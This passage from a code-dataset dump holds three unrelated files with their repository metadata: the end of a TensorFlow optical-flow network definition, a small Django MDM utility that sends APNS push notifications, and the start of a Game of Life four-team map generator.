blobs['blob105'] = tf.nn.conv2d_transpose(blobs['blob103'], self.weights['net3_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['net3_deconv2_b']
blobs['blob105'] = self.leaky_relu(blobs['blob105'], 0.1)
blobs['blob106'] = tf.nn.conv2d_transpose(blobs['blob104'], self.weights['net3_net3_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow3to2_b']
blobs['blob107'] = tf.concat([blobs['blob83'], blobs['blob105'], blobs['blob106']], axis=3)
blobs['blob108'] = tf.nn.conv2d(blobs['blob107'], self.weights['net3_predict_conv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv2_b']
blobs['blob109'] = blobs['blob108'] * 20.
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE THIRD BRANCH ####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob110'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize']], axis=3)
#self.run_after(blobs['blob110'], blobs['blob109'])
blobs['blob111'] = tf.nn.conv2d(blobs['blob110'], self.weights['netsd_conv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv0_b']
blobs['blob111'] = self.leaky_relu(blobs['blob111'], 0.1)
blobs['blob112'] = tf.pad(blobs['blob111'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob112'] = tf.nn.conv2d(blobs['blob112'], self.weights['netsd_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv1_b']
blobs['blob112'] = self.leaky_relu(blobs['blob112'], 0.1)
blobs['blob113'] = tf.nn.conv2d(blobs['blob112'], self.weights['netsd_conv1_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv1_1_b']
blobs['blob113'] = self.leaky_relu(blobs['blob113'], 0.1)
blobs['blob114'] = tf.pad(blobs['blob113'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob114'] = tf.nn.conv2d(blobs['blob114'], self.weights['netsd_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv2_b']
blobs['blob114'] = self.leaky_relu(blobs['blob114'], 0.1)
blobs['blob115'] = tf.nn.conv2d(blobs['blob114'], self.weights['netsd_conv2_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv2_1_b']
blobs['blob115'] = self.leaky_relu(blobs['blob115'], 0.1)
blobs['blob116'] = tf.pad(blobs['blob115'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob116'] = tf.nn.conv2d(blobs['blob116'], self.weights['netsd_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv3_b']
blobs['blob116'] = self.leaky_relu(blobs['blob116'], 0.1)
blobs['blob117'] = tf.nn.conv2d(blobs['blob116'], self.weights['netsd_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv3_1_b']
blobs['blob117'] = self.leaky_relu(blobs['blob117'], 0.1)
blobs['blob118'] = tf.pad(blobs['blob117'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob118'] = tf.nn.conv2d(blobs['blob118'], self.weights['netsd_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv4_b']
blobs['blob118'] = self.leaky_relu(blobs['blob118'], 0.1)
blobs['blob119'] = tf.nn.conv2d(blobs['blob118'], self.weights['netsd_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv4_1_b']
blobs['blob119'] = self.leaky_relu(blobs['blob119'], 0.1)
blobs['blob120'] = tf.pad(blobs['blob119'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob120'] = tf.nn.conv2d(blobs['blob120'], self.weights['netsd_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv5_b']
blobs['blob120'] = self.leaky_relu(blobs['blob120'], 0.1)
blobs['blob121'] = tf.nn.conv2d(blobs['blob120'], self.weights['netsd_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv5_1_b']
blobs['blob121'] = self.leaky_relu(blobs['blob121'], 0.1)
blobs['blob122'] = tf.pad(blobs['blob121'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob122'] = tf.nn.conv2d(blobs['blob122'], self.weights['netsd_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv6_b']
blobs['blob122'] = self.leaky_relu(blobs['blob122'], 0.1)
blobs['blob123'] = tf.nn.conv2d(blobs['blob122'], self.weights['netsd_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv6_1_b']
blobs['blob123'] = self.leaky_relu(blobs['blob123'], 0.1)
blobs['blob124'] = tf.nn.conv2d(blobs['blob123'], self.weights['netsd_Convolution1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution1_b']
blobs['blob125'] = tf.nn.conv2d_transpose(blobs['blob123'], self.weights['netsd_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['netsd_deconv5_b']
blobs['blob125'] = self.leaky_relu(blobs['blob125'], 0.1)
blobs['blob126'] = tf.nn.conv2d_transpose(blobs['blob124'], self.weights['netsd_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow6to5_b']
blobs['blob127'] = tf.concat([blobs['blob121'], blobs['blob125'], blobs['blob126']], axis=3)
blobs['blob128'] = tf.nn.conv2d(blobs['blob127'], self.weights['netsd_interconv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv5_b']
blobs['blob129'] = tf.nn.conv2d(blobs['blob128'], self.weights['netsd_Convolution2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution2_b']
blobs['blob130'] = tf.nn.conv2d_transpose(blobs['blob127'], self.weights['netsd_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['netsd_deconv4_b']
blobs['blob130'] = self.leaky_relu(blobs['blob130'], 0.1)
blobs['blob131'] = tf.nn.conv2d_transpose(blobs['blob129'], self.weights['netsd_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow5to4_b']
blobs['blob132'] = tf.concat([blobs['blob119'], blobs['blob130'], blobs['blob131']], axis=3)
blobs['blob133'] = tf.nn.conv2d(blobs['blob132'], self.weights['netsd_interconv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv4_b']
blobs['blob134'] = tf.nn.conv2d(blobs['blob133'], self.weights['netsd_Convolution3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution3_b']
blobs['blob135'] = tf.nn.conv2d_transpose(blobs['blob132'], self.weights['netsd_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['netsd_deconv3_b']
blobs['blob135'] = self.leaky_relu(blobs['blob135'], 0.1)
blobs['blob136'] = tf.nn.conv2d_transpose(blobs['blob134'], self.weights['netsd_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow4to3_b']
blobs['blob137'] = tf.concat([blobs['blob117'], blobs['blob135'], blobs['blob136']], axis=3)
blobs['blob138'] = tf.nn.conv2d(blobs['blob137'], self.weights['netsd_interconv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv3_b']
blobs['blob139'] = tf.nn.conv2d(blobs['blob138'], self.weights['netsd_Convolution4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution4_b']
blobs['blob140'] = tf.nn.conv2d_transpose(blobs['blob137'], self.weights['netsd_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['netsd_deconv2_b']
blobs['blob140'] = self.leaky_relu(blobs['blob140'], 0.1)
blobs['blob141'] = tf.nn.conv2d_transpose(blobs['blob139'], self.weights['netsd_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow3to2_b']
blobs['blob142'] = tf.concat([blobs['blob115'], blobs['blob140'], blobs['blob141']], axis=3)
blobs['blob143'] = tf.nn.conv2d(blobs['blob142'], self.weights['netsd_interconv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv2_b']
blobs['blob144'] = tf.nn.conv2d(blobs['blob143'], self.weights['netsd_Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution5_b']
blobs['blob145'] = 0.05*blobs['blob144']
blobs['blob146'] = tf.image.resize_nearest_neighbor(blobs['blob145'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=False)
blobs['blob147'] = tf.image.resize_nearest_neighbor(blobs['blob109'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=False)
#blobs['blob148'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob146']**2, axis=3, keep_dims=True))
blobs['blob148'] = self.l2_norm(blobs['blob146'])
#blobs['blob149'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob147']**2, axis=3, keep_dims=True))
blobs['blob149'] = self.l2_norm(blobs['blob147'])
blobs['blob150'] = self.warp(blobs['img1_nomean_resize'], blobs['blob146'])
blobs['blob151'] = blobs['img0_nomean_resize'] - blobs['blob150']
#blobs['blob152'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob151']**2, axis=3, keep_dims=True))
blobs['blob152'] = self.l2_norm(blobs['blob151'])
blobs['blob153'] = self.warp(blobs['img1_nomean_resize'], blobs['blob147'])
blobs['blob154'] = blobs['img0_nomean_resize'] - blobs['blob153']
#blobs['blob155'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob154']**2, axis=3, keep_dims=True))
blobs['blob155'] = self.l2_norm(blobs['blob154'])
blobs['blob156'] = tf.concat([blobs['img0_nomean_resize'], blobs['blob146'], blobs['blob147'], blobs['blob148'], blobs['blob149'], blobs['blob152'], blobs['blob155']], axis=3)
blobs['blob157'] = tf.nn.conv2d(blobs['blob156'], self.weights['fuse_conv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv0_b']
blobs['blob157'] = self.leaky_relu(blobs['blob157'], 0.1)
blobs['blob158'] = tf.pad(blobs['blob157'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob158'] = tf.nn.conv2d(blobs['blob158'], self.weights['fuse_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['fuse_conv1_b']
blobs['blob158'] = self.leaky_relu(blobs['blob158'], 0.1)
blobs['blob159'] = tf.nn.conv2d(blobs['blob158'], self.weights['fuse_conv1_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv1_1_b']
blobs['blob159'] = self.leaky_relu(blobs['blob159'], 0.1)
blobs['blob160'] = tf.pad(blobs['blob159'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob160'] = tf.nn.conv2d(blobs['blob160'], self.weights['fuse_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['fuse_conv2_b']
blobs['blob160'] = self.leaky_relu(blobs['blob160'], 0.1)
blobs['blob161'] = tf.nn.conv2d(blobs['blob160'], self.weights['fuse_conv2_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv2_1_b']
blobs['blob161'] = self.leaky_relu(blobs['blob161'], 0.1)
blobs['blob162'] = tf.nn.conv2d(blobs['blob161'], self.weights['fuse__Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution5_b']
blobs['blob163'] = tf.nn.conv2d_transpose(blobs['blob161'], self.weights['fuse_deconv1_w'], output_shape=[batch_size, ADAPTED_HEIGHT/2, ADAPTED_WIDTH/2, 32], strides=[1,2,2,1]) + self.weights['fuse_deconv1_b']
blobs['blob163'] = self.leaky_relu(blobs['blob163'], 0.1)
blobs['blob164'] = tf.nn.conv2d_transpose(blobs['blob162'], self.weights['fuse_upsample_flow2to1_w'], output_shape=[batch_size, ADAPTED_HEIGHT/2, ADAPTED_WIDTH/2, 2], strides=[1,2,2,1]) + self.weights['fuse_upsample_flow2to1_b']
blobs['blob165'] = tf.concat([blobs['blob159'], blobs['blob163'], blobs['blob164']], axis=3)
blobs['blob166'] = tf.nn.conv2d(blobs['blob165'], self.weights['fuse_interconv1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_interconv1_b']
blobs['blob167'] = tf.nn.conv2d(blobs['blob166'], self.weights['fuse__Convolution6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution6_b']
blobs['blob168'] = tf.nn.conv2d_transpose(blobs['blob165'], self.weights['fuse_deconv0_w'], output_shape=[batch_size, ADAPTED_HEIGHT/1, ADAPTED_WIDTH/1, 16], strides=[1,2,2,1]) + self.weights['fuse_deconv0_b']
blobs['blob168'] = self.leaky_relu(blobs['blob168'], 0.1)
blobs['blob169'] = tf.nn.conv2d_transpose(blobs['blob167'], self.weights['fuse_upsample_flow1to0_w'], output_shape=[batch_size, ADAPTED_HEIGHT, ADAPTED_WIDTH, 2], strides=[1,2,2,1]) + self.weights['fuse_upsample_flow1to0_b']
blobs['blob170'] = tf.concat([blobs['blob157'], blobs['blob168'], blobs['blob169']], axis=3)
blobs['blob171'] = tf.nn.conv2d(blobs['blob170'], self.weights['fuse_interconv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_interconv0_b']
blobs['blob172'] = tf.nn.conv2d(blobs['blob171'], self.weights['fuse__Convolution7_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution7_b']
blobs['predict_flow_resize'] = tf.image.resize_bilinear(blobs['blob172'], size=[TARGET_HEIGHT, TARGET_WIDTH], align_corners=True)
scale = tf.stack([SCALE_WIDTH, SCALE_HEIGHT])
scale = tf.reshape(scale, [1,1,1,2])
blobs['predict_flow_final'] = scale*blobs['predict_flow_resize']
self.blobs = blobs
return blobs
def all_variables(self):
return [('netsd_deconv5_w', (4, 4, 512, 1024)),
('netsd_conv1_b', (64,)),
('netsd_upsample_flow5to4_w', (4, 4, 2, 2)),
('conv2_b', (128,)),
('fuse__Convolution5_w', (3, 3, 128, 2)),
('netsd_conv4_1_w', (3, 3, 512, 512)),
('netsd_interconv3_w', (3, 3, 386, 128)),
('netsd_deconv4_w', (4, 4, 256, 1026)),
('deconv4_b', (256,)),
('fuse_interconv0_w', (3, 3, 82, 16)),
('netsd_Convolution2_b', (2,)),
('net3_conv4_b', (512,)),
('net3_conv3_b', (256,)),
('net3_predict_conv2_w', (3, 3, 194, 2)),
('net3_predict_conv3_b', (2,)),
('conv6_1_w', (3, 3, 1024, 1024)),
('fuse_upsample_flow2to1_b', (2,)),
('Convolution1_w', (3, 3, 1024, 2)),
('net3_deconv3_w', (4, 4, 128, 770)),
('net2_deconv3_b', (128,)),
('fuse_conv1_w', (3, 3, 64, 64)),
('conv5_w', (3, 3, 512, 512)),
('Convolution4_w', (3, 3, 386, 2)),
('fuse_conv0_b', (64,)),
('net2_conv3_w', (5, 5, 128, 256)),
('upsample_flow4to3_b', (2,)),
('netsd_conv4_1_b', (512,)),
('fuse_upsample_flow2to1_w', (4, 4, 2, 2)),
('netsd_conv4_b', (512,)),
('net2_net2_upsample_flow3to2_b', (2,)),
('net3_predict_conv4_b', (2,)),
('fuse_upsample_flow1to0_b', (2,)),
('conv4_1_w', (3, 3, 512, 512)),
('deconv2_b', (64,)),
('net2_conv4_1_w', (3, 3, 512, 512)),
('net3_deconv4_w', (4, 4, 256, 1026)),
('net2_deconv5_b', (512,)),
('netsd_deconv5_b', (512,)),
('net2_deconv2_b', (64,)),
('net3_conv2_b', (128,)),
('conv_redir_w', (1, 1, 256, 32)),
('fuse_conv1_1_b', (128,)),
('net2_deconv5_w', (4, 4, 512, 1024)),
('net2_conv5_b', (512,)),
('net2_conv4_w', (3, 3, 256, 512)),
('net2_predict_conv6_w', (3, 3, 1024, 2)),
('netsd_conv5_b', (512,)),
('deconv4_w', (4, 4, 256, 1026)),
('net2_net2_upsample_flow4to3_b', (2,)),
('fuse__Convolution6_w', (3, 3, 32, 2)),
('net3_deconv2_w', (4, 4, 64, 386)),
('net2_conv6_1_w', (3, 3, 1024, 1024)),
('netsd_conv0_b', (64,)),
('netsd_conv5_1_w', (3, 3, 512, 512)),
('net2_conv6_1_b', (1024,)),
('net3_conv2_w', (5, 5, 64, 128)),
('net3_predict_conv6_w', (3, 3, 1024, 2)),
('net3_conv4_1_b', (512,)),
('net3_net3_upsample_flow4to3_w', (4, 4, 2, 2)),
('net2_deconv2_w', (4, 4, 64, 386)),
('deconv3_b', (128,)),
('netsd_interconv5_b', (512,)),
('net2_conv3_1_w', (3, 3, 256, 256)),
('netsd_interconv4_w', (3, 3, 770, 256)),
('net3_deconv3_b', (128,)),
('fuse_conv0_w', (3, 3, 11, 64)),
('net3_predict_conv6_b', (2,)),
('fuse_upsample_flow1to0_w', (4, 4, 2, 2)),
('netsd_deconv3_b', (128,)),
('net3_predict_conv5_w', (3, 3, 1026, 2)),
('netsd_conv5_w', (3, 3, 512, 512)),
('netsd_interconv5_w', (3, 3, 1026, 512)),
('netsd_Convolution3_w', (3, 3, 256, 2)),
('net2_predict_conv4_w', (3, 3, 770, 2)),
('deconv2_w', (4, 4, 64, 386)),
('net3_predict_conv5_b', (2,)),
('fuse__Convolution5_b', (2,)),
('fuse__Convolution7_w', (3, 3, 16, 2)),
('net2_net2_upsample_flow6to5_w', (4, 4, 2, 2)),
('netsd_conv3_b', (256,)),
('net3_conv6_w', (3, 3, 512, 1024)),
('net3_conv1_b', (64,)),
('netsd_Convolution4_b', (2,)),
('net3_conv3_w', (5, 5, 128, 256)),
('netsd_conv0_w', (3, 3, 6, 64)),
('net2_conv4_b', (512,)),
('net2_predict_conv3_w', (3, 3, 386, 2)),
('net3_net3_upsample_flow3to2_w', (4, 4, 2, 2)),
('fuse_conv1_1_w', (3, 3, 64, 128)),
('deconv5_b', (512,)),
('fuse__Convolution7_b', (2,)),
('net3_conv6_1_w', (3, 3, 1024, 1024)),
('net3_net3_upsample_flow5to4_w', (4, 4, 2, 2)),
('net3_conv4_w', (3, 3, 256, 512)),
('upsample_flow5to4_w', (4, 4, 2, 2)),
('conv4_1_b', (512,)),
('img0s_aug_b', (320, 448, 3, 1)),
('conv5_1_b', (512,)),
('net3_conv4_1_w', (3, 3, 512, 512)),
('upsample_flow5to4_b', (2,)),
('net3_conv3_1_b', (256,)),
('Convolution1_b', (2,)),
('upsample_flow4to3_w', (4, 4, 2, 2)),
('conv5_1_w', (3, 3, 512, 512)),
('conv3_1_b', (256,)),
('conv3_w', (5, 5, 128, 256)),
('net2_conv2_b', (128,)),
('net3_net3_upsample_flow6to5_w', (4, 4, 2, 2)),
('upsample_flow3to2_b', (2,)),
('netsd_Convolution5_w', (3, 3, 64, 2)),
('netsd_interconv2_w', (3, 3, 194, 64)),
('net2_predict_conv6_b', (2,)),
('net2_deconv4_w', (4, 4, 256, 1026)),
('scale_conv1_b', (2,)),
('net2_net2_upsample_flow5to4_w', (4, 4, 2, 2)),
('netsd_conv2_b', (128,)),
('netsd_conv2_1_b', (128,)),
('netsd_upsample_flow6to5_w', (4, 4, 2, 2)),
('net2_predict_conv5_b', (2,)),
('net3_conv6_1_b', (1024,)),
('netsd_conv6_w', (3, 3, 512, 1024)),
('Convolution4_b', (2,)),
('net2_predict_conv4_b', (2,)),
('fuse_deconv1_b', (32,)),
('conv3_1_w', (3, 3, 473, 256)),
('net3_deconv2_b', (64,)),
('netsd_conv6_b', (1024,)),
('net2_conv5_1_w', (3, 3, 512, 512)),
('net3_conv5_1_w', (3, 3, 512, 512)),
('deconv5_w', (4, 4, 512, 1024)),
('fuse_conv2_b', (128,)),
('netsd_conv1_1_b', (128,)),
('netsd_upsample_flow6to5_b', (2,)),
('Convolution5_w', (3, 3, 194, 2)),
('scale_conv1_w', (1, 1, 2, 2)),
('net2_net2_upsample_flow5to4_b', (2,)),
('conv6_1_b', (1024,)),
('fuse_conv2_1_b', (128,)),
('netsd_Convolution5_b', (2,)),
('netsd_conv3_1_b', (256,)),
('conv2_w', (5, 5, 64, 128)),
('fuse_conv2_w', (3, 3, 128, 128)),
('net2_conv2_w', (5, 5, 64, 128)),
('conv3_b', (256,)),
('net3_deconv5_w', (4, 4, 512, 1024)),
('img1s_aug_w', (1, 1, 1, 1)),
('netsd_conv2_w', (3, 3, 128, 128)),
('conv6_w', (3, 3, 512, 1024)),
('netsd_conv4_w', (3, 3, 256, 512)),
('net2_conv1_w', (7, 7, 12, 64)),
('netsd_Convolution1_w', (3, 3, 1024, 2)),
('netsd_conv1_w', (3, 3, 64, 64)),
('netsd_deconv4_b', (256,)),
('conv4_w', (3, 3, 256, 512)),
('conv5_b', (512,)),
('net3_deconv5_b', (512,)),
('netsd_interconv3_b', (128,)),
('net3_conv3_1_w', (3, 3, 256, 256)),
('net2_predict_conv5_w', (3, 3, 1026, 2)),
('Convolution3_b', (2,)),
('netsd_conv5_1_b', (512,)),
('netsd_interconv4_b', (256,)),
('conv4_b', (512,)),
('net3_net3_upsample_flow6to5_b', (2,)),
('Convolution5_b', (2,)),
('fuse_conv2_1_w', (3, 3, 128, 128)),
('net3_net3_upsample_flow4to3_b', (2,)),
('conv1_w', (7, 7, 3, 64)),
('upsample_flow6to5_b', (2,)),
('conv6_b', (1024,)),
('netsd_upsample_flow3to2_w', (4, 4, 2, 2)),
('net2_deconv3_w', (4, 4, 128, 770)),
('netsd_conv2_1_w', (3, 3, 128, 128)),
('netsd_Convolution3_b', (2,)),
('netsd_upsample_flow4to3_w', (4, 4, 2, 2)),
('fuse_interconv1_w', (3, 3, 162, 32)),
('netsd_upsample_flow4to3_b', (2,)),
('netsd_conv3_1_w', (3, 3, 256, 256)),
('netsd_deconv3_w', (4, 4, 128, 770)),
('net3_conv5_b', (512,)),
('net3_conv5_1_b', (512,)),
('net2_net2_upsample_flow4to3_w', (4, 4, 2, 2)),
('net2_net2_upsample_flow3to2_w', (4, 4, 2, 2)),
('net2_conv3_b', (256,)),
('netsd_conv6_1_w', (3, 3, 1024, 1024)),
('fuse_deconv0_b', (16,)),
('net2_predict_conv2_w', (3, 3, 194, 2)),
('net2_conv1_b', (64,)),
('net2_conv6_b', (1024,)),
('net3_predict_conv2_b', (2,)),
('net2_conv4_1_b', (512,)),
('netsd_Convolution4_w', (3, 3, 128, 2)),
('deconv3_w', (4, 4, 128, 770)),
('fuse_deconv1_w', (4, 4, 32, 128)),
('netsd_Convolution2_w', (3, 3, 512, 2)),
('netsd_Convolution1_b', (2,)),
('net2_conv3_1_b', (256,)),
('fuse_conv1_b', (64,)),
('net2_deconv4_b', (256,)),
('net3_predict_conv4_w', (3, 3, 770, 2)),
('Convolution3_w', (3, 3, 770, 2)),
('netsd_upsample_flow3to2_b', (2,)),
('net3_net3_upsample_flow3to2_b', (2,)),
('fuse_interconv0_b', (16,)),
('Convolution2_w', (3, 3, 1026, 2)),
('net2_conv6_w', (3, 3, 512, 1024)),
('netsd_conv3_w', (3, 3, 128, 256)),
('netsd_upsample_flow5to4_b', (2,)),
('net3_predict_conv3_w', (3, 3, 386, 2)),
('conv_redir_b', (32,)),
('net2_conv5_1_b', (512,)),
('upsample_flow6to5_w', (4, 4, 2, 2)),
('net2_net2_upsample_flow6to5_b', (2,)),
('net3_conv6_b', (1024,)),
('fuse__Convolution6_b', (2,)),
('Convolution2_b', (2,)),
('upsample_flow3to2_w', (4, 4, 2, 2)),
('net3_conv1_w', (7, 7, 12, 64)),
('fuse_deconv0_w', (4, 4, 16, 162)),
('img0s_aug_w', (1, 1, 1, 1)),
('netsd_conv1_1_w', (3, 3, 64, 128)),
('netsd_deconv2_b', (64,)),
('net2_conv5_w', (3, 3, 512, 512)),
('fuse_interconv1_b', (32,)),
('netsd_conv6_1_b', (1024,)),
('netsd_interconv2_b', (64,)),
('img1s_aug_b', (320, 448, 3, 1)),
('netsd_deconv2_w', (4, 4, 64, 386)),
('net2_predict_conv3_b', (2,)),
('net2_predict_conv2_b', (2,)),
('net3_deconv4_b', (256,)),
('net3_net3_upsample_flow5to4_b', (2,)),
('conv1_b', (64,)),
('net3_conv5_w', (3, 3, 512, 512))]
| 63.473424
| 253
| 0.574761
| 51,245
| 0.997955
| 0
| 0
| 0
| 0
| 0
| 0
| 17,778
| 0.346212
|
a1e2e6423c6af48c84a3959d270e3cdaa9b51fa4
| 874
|
py
|
Python
|
mdm/utils.py
|
agnihotri7/dj_mdm
|
9fc68393d270d361d2a37b726282277b15121658
|
[
"MIT"
] | null | null | null |
mdm/utils.py
|
agnihotri7/dj_mdm
|
9fc68393d270d361d2a37b726282277b15121658
|
[
"MIT"
] | null | null | null |
mdm/utils.py
|
agnihotri7/dj_mdm
|
9fc68393d270d361d2a37b726282277b15121658
|
[
"MIT"
] | null | null | null |
"""
"""
import sys
import uuid
import base64
import fileinput
import datetime
from django.utils import timezone
from django.conf import settings
from django.shortcuts import get_object_or_404
from urlparse import urlparse, parse_qs
from APNSWrapper import *
from mdm.models import MDMDevice, DeviceCommand
def replaceAll(file, searchExp, replaceExp):
for line in fileinput.input(file, inplace=1):
if searchExp in line:
line = line.replace(searchExp, replaceExp)
sys.stdout.write(line)
def notify_device(device):
device_token = base64.b64decode(device.device_token)
cert = settings.APNS_CERT
wrapper = APNSNotificationWrapper(cert, False)
message = APNSNotification()
message.token(device_token)
message.appendProperty(APNSProperty('mdm', str(device.push_magic)))
wrapper.append(message)
wrapper.notify()
| 25.705882
| 71
| 0.751716
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 12
| 0.01373
|
a1e35648e878d2c215539f5ee4e619b32ea82f3c
| 34,207
|
py
|
Python
|
gollyx_maps/rainbow.py
|
golly-splorts/gollyx-maps
|
ad57b6e0665a7f2a54f2cfa31717ce152ac3d046
|
[
"MIT"
] | null | null | null |
gollyx_maps/rainbow.py
|
golly-splorts/gollyx-maps
|
ad57b6e0665a7f2a54f2cfa31717ce152ac3d046
|
[
"MIT"
] | null | null | null |
gollyx_maps/rainbow.py
|
golly-splorts/gollyx-maps
|
ad57b6e0665a7f2a54f2cfa31717ce152ac3d046
|
[
"MIT"
] | null | null | null |
import math
import itertools
from operator import itemgetter
import json
import os
import random
from .geom import hflip_pattern, vflip_pattern, rot_pattern
from .patterns import (
get_pattern_size,
get_pattern_livecount,
get_grid_empty,
get_grid_pattern,
segment_pattern,
methuselah_quadrants_pattern,
pattern_union,
cloud_region,
)
from .utils import pattern2url, retry_on_failure
from .error import GollyXPatternsError, GollyXMapsError
##############
# Util methods
def get_rainbow_pattern_function_map():
return {
"rainbowmath": rainbowmath_fourcolor,
"rainbow": rainbow_fourcolor,
"sunburst": sunburst_fourcolor,
"quadgaussian": quadgaussian_fourcolor,
"random": random_fourcolor,
"timebomb": timebomb_fourcolor,
"timebombredux": timebomb2_fourcolor,
"randommethuselahs": randommethuselahs_fourcolor,
"crabs": crabs_fourcolor,
"patiolights": patiolights_fourcolor,
"orchard": orchard_fourcolor,
"justyna": justyna_fourcolor,
"rabbits": rabbits_fourcolor,
"multum": multum_fourcolor,
"eights": eightx_fourcolor,
# Need one more
}
def rainbow_jitteryrow_pattern(rows, cols, seed=None, methuselah=None, spacing=None):
if seed is not None:
random.seed(seed)
# L is a characteristic length scale
if spacing is None:
L = 10
else:
L = spacing
if methuselah is None:
methuselah = "rheptomino"
count = cols // L
centerx = cols // 2
centery = rows // 2
# Place one methuselah every L grid spaces,
# up to the maximum multiple of 4 possible
maxshapesperteam = (cols // 4) // L
maxshapes = 4 * maxshapesperteam
team_assignments = [0, 1, 2, 3]
random.shuffle(team_assignments)
rotdegs = [0, 90, 180, 270]
patterns_list_all = [[], [], [], []]
# This algorithm is structured unusually,
# but ensures everything is centered.
for i in range(maxshapesperteam):
# Populate all four quadrants manually...
end = (i + 1) * L
start = end - L // 2
# +---------------+
# |Q1 |Q2 |Q3 |Q4 |
# | | | | |
# +---------------+
#
# Q1
pattern = get_grid_pattern(
methuselah,
rows,
cols,
xoffset=centerx - centerx // 2 - random.randint(start, end),
yoffset=centery + random.randint(-L, L),
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[0]
team_patterns_list = patterns_list_all[team_ix]
team_patterns_list.append(pattern)
patterns_list_all[team_ix] = team_patterns_list
# Q2
pattern = get_grid_pattern(
methuselah,
rows,
cols,
xoffset=centerx - random.randint(start, end),
yoffset=centery + random.randint(-L, L),
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[1]
team_patterns_list = patterns_list_all[team_ix]
team_patterns_list.append(pattern)
patterns_list_all[team_ix] = team_patterns_list
# Q3
pattern = get_grid_pattern(
methuselah,
rows,
cols,
xoffset=centerx + random.randint(start, end),
yoffset=centery + random.randint(-L, L),
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[2]
team_patterns_list = patterns_list_all[team_ix]
team_patterns_list.append(pattern)
